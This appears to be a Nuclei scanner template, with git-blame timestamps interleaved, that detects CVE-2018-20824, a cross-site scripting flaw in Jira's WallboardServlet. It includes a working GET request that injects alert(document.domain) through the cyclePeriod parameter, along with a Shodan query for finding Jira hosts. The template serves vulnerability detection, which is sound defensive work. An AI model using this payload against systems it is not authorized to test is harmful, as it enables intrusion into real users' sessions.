2021-01-02 05:00:39 +00:00
id : CVE-2018-20824
2020-06-22 13:35:37 +00:00
info :
2022-08-12 00:45:50 +00:00
name : Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting
2021-06-09 12:20:56 +00:00
author : madrobot,dwisiswant0
2020-06-22 13:35:37 +00:00
severity : medium
2022-08-12 00:45:50 +00:00
description : The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade to Atlassian Jira version 7.13.1 or later to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://jira.atlassian.com/browse/JRASERVER-69238
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-20824
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-20824
cwe-id : CWE-79
2023-11-10 17:07:52 +00:00
epss-score : 0.00203
2023-12-12 11:07:52 +00:00
epss-percentile : 0.5806
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
2022-07-04 13:18:51 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : atlassian
product : jira
2023-09-06 12:57:14 +00:00
shodan-query : http.component:"Atlassian Jira"
2022-04-22 10:38:41 +00:00
tags : cve,cve2018,atlassian,jira,xss
2020-06-22 13:35:37 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-06-22 13:35:37 +00:00
- method : GET
path :
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
2023-07-11 19:49:27 +00:00
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-06-22 13:35:37 +00:00
matchers :
2020-07-08 20:45:08 +00:00
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2020-07-08 20:45:08 +00:00
regex :
- (?mi)timeout:\salert\(document\.domain\)
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-12-12 12:02:03 +00:00
# digest: 4a0a0047304502202360b94b2b66b216848ecb0bede29dfa5737e36d86988eb5f4c6d1553b54ff29022100dcff5670f067d91be209bf7cbf8b3bae15f88b03be7d0b47cc6803c106d8c16a:922c64590222798bb761d5b6d8e72950